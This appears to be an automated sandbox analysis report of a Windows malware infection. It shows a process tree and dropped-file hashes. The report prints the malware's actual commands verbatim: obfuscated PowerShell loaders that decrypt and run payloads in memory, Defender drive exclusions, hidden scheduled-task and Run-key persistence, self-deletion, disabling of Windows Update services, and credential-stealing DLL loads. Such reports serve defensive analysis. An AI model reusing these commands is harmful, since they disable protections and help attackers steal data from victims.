C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1802.exeC:\Users\Admin\AppData\Local\Temp\1802.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 164 -s 14363⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1F18.exeC:\Users\Admin\AppData\Local\Temp\1F18.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\21D8.exeC:\Users\Admin\AppData\Local\Temp\21D8.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 4803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\6AC9.exeC:\Users\Admin\AppData\Local\Temp\6AC9.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B31.bat" "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9B31.bat.exe"C:\Users\Admin\AppData\Local\Temp\9B31.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4896);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\9B31')4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #6⤵
-
C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe"C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3136);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')7⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd" "8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe"C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe" function Fz($l){$l.Replace('AiBmN', '')}$vloA=Fz 'CreAiBmNateAiBmNDecAiBmNryAiBmNptAiBmNoAiBmNrAiBmN';$niFt=Fz 'LoAiBmNadAiBmN';$Ubgw=Fz 'ChaAiBmNngeAiBmNExAiBmNtenAiBmNsiAiBmNonAiBmN';$TCNm=Fz 'TraAiBmNnsfoAiBmNrmFAiBmNinAiBmNalAiBmNBlAiBmNoAiBmNckAiBmN';$KsKu=Fz 'ReAiBmNaAiBmNdAiBmNLinAiBmNesAiBmN';$gOmL=Fz 'FrAiBmNomAiBmNBaAiBmNsAiBmNeAiBmN64StAiBmNriAiBmNngAiBmN';$CdTj=Fz 'InvAiBmNokeAiBmN';$VkgB=Fz 'FirsAiBmNtAiBmN';$bUDG=Fz 'GeAiBmNtCuAiBmNrrAiBmNenAiBmNtPAiBmNrAiBmNocAiBmNesAiBmNsAiBmN';$CMHm=Fz 'EnAiBmNtrAiBmNyPAiBmNoAiBmNinAiBmNtAiBmN';function VZwrE($IxAst){$OdcJU=[System.Security.Cryptography.Aes]::Create();$OdcJU.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OdcJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OdcJU.Key=[System.Convert]::$gOmL('tRx60Ue+BsVSsmoXBDDY1e0gF+3mmpb6DEUhsmAbHFA=');$OdcJU.IV=[System.Convert]::$gOmL('0o09sv5yq4yWOVwemrt4fA==');$QGThv=$OdcJU.$vloA();$JmosV=$QGThv.$TCNm($IxAst,0,$IxAst.Length);$QGThv.Dispose();$OdcJU.Dispose();$JmosV;}function cUmcA($IxAst){$DaPTT=New-Object System.IO.MemoryStream(,$IxAst);$bUbZV=New-Object System.IO.MemoryStream;$ixPPp=New-Object System.IO.Compression.GZipStream($DaPTT,[IO.Compression.CompressionMode]::Decompress);$ixPPp.CopyTo($bUbZV);$ixPPp.Dispose();$DaPTT.Dispose();$bUbZV.Dispose();$bUbZV.ToArray();}function HBQCk($IxAst,$yhWuH){[System.Reflection.Assembly]::$niFt([byte[]]$IxAst).$CMHm.$CdTj($null,$yhWuH);}$rGDzs=[System.Linq.Enumerable]::$VkgB([System.IO.File]::$KsKu([System.IO.Path]::$Ubgw([System.Diagnostics.Process]::$bUDG().MainModule.FileName, $null)));$xqJgF = $rGDzs.Substring(3).Split('\');$seypB=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[0])));$aINzU=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[1])));HBQCk $aINzU $null;HBQCk $seypB $null;9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1912);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4088);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\CCE0.exeC:\Users\Admin\AppData\Local\Temp\CCE0.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4904" "2316" "2320" "2512" "0" "0" "2468" "0" "0" "0" "0" "0"3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD5e5b1cc0ae5af6a8277d75cff4af2c5e8
SHA14768fff3d4bbe02f89683b4a0e7b15b24b54eb9f
SHA256d950c0d748aae641d71b11cd1c519b289917c23bee1a2b6bc5c496fd8e5d4655
SHA51257a4737deeefac0124d73b52525993fecbbebd21a556ece87f8e79e845e07f037abb5e49f7458e8a010935c6691f18fbb913d77ecfb2ba902067788c483ec3d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
1KB
MD53adac03b181d7980568dda0da0efc9de
SHA1a283c4c9bd26a65b8240d21708e57f5946778341
SHA25624c4973ced938b77d9670ac79eb76cd52411b17ab59ec78ba14c1b433f342933
SHA5126fbd2a32fc18606628ea56311764cd879a1196405dddd4d269ad6163b2ffdcf916786f1c0328f27ec089be5cb9b4ecb3542363f4dfb3df1c1b91a0e038b67241
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
488B
MD5875bb33cf942ab8551298b17d559746e
SHA1a8101733fa65473b9ff0532cdfb7cc86d17a636e
SHA256413795736985d605338919da68bf9561c5f1121b75b5be87ea7b522fec655c64
SHA51269307af30e98a761c2e488591138baa1320274a2edf26c69f53e0dfe35fbae80b93d8e46ceacf8eb846aa6481ddcc62287d2f318fa2b8201d3c2d43cd9977dd9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
482B
MD5cb12f3edc47d4fc97fc9a32fcce8ac11
SHA10e421b0aa2e7a150f96d0565fee3d1b19a210d57
SHA2562b302045e0c070df6b5c9acfbafb9191981987bceb2fe8fb076f44559a4cc1c7
SHA512b3bec41b314f8e6962786ebf8e199bfb4e49d3518d87a0441f73f3c12a5b850cd7e5239dadf9eb636411284932e57cd2142f3473ce7002bf657a4935885327c6
-
C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
